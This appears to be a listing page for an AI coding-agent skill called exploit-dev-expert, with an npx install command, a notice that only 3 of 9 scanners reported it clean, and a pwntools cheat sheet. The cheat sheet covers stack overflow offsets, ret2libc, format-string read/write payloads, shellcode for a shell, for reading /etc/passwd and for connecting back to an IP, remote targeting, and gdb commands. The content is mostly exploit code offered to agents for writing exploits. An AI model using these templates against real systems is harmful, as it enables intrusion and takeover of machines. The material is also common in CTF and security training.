.agent/skills/exploit-dev-expert/SKILL.md
Exploit development expert. Buffer overflow, shellcode, ROP, format strings, binary exploitation. Use for exploit writing and PoC development.
```bash
npx skillsauth add ripgraphics/authorsinfo exploit-dev-expert
```

Install this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
3 of 9 scanners reported clean
```python
from pwn import *

# Find offset
cyclic(200)                    # Generate pattern
cyclic_find(0x61616166)        # Find offset

# Basic exploit
offset = 64
ret_addr = p64(0x401234)
payload = b'A' * offset + ret_addr

# With NX bypass (ret2libc)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
system = libc.symbols['system']
bin_sh = next(libc.search(b'/bin/sh'))
```
```python
# Read from stack
payload = b'%x.' * 20
payload = b'%7$s'              # Read specific position

# Write to address
payload = fmtstr_payload(offset, {target_addr: value})
```
```python
# Using pwntools
context.arch = 'amd64'
shellcode = asm(shellcraft.sh())

# Common shellcodes
shellcraft.sh()                # /bin/sh
shellcraft.cat('/etc/passwd')
shellcraft.connect('IP', PORT)
```
```python
from pwn import *

# Setup
context.binary = ELF('./vuln')
context.log_level = 'debug'

# Connection
p = process('./vuln')          # Local
p = remote('ip', port)         # Remote
p = gdb.debug('./vuln')        # With GDB

# I/O
p.sendline(payload)
p.recvuntil(b'>')
data = p.recv(100)

# Interactive
p.interactive()
```
```
gdb ./binary
> checksec           # Security features
> info functions     # List functions
> disas main         # Disassemble
> b *0x401234        # Breakpoint
> r < payload.txt    # Run with input
> x/20wx $rsp        # Examine stack
```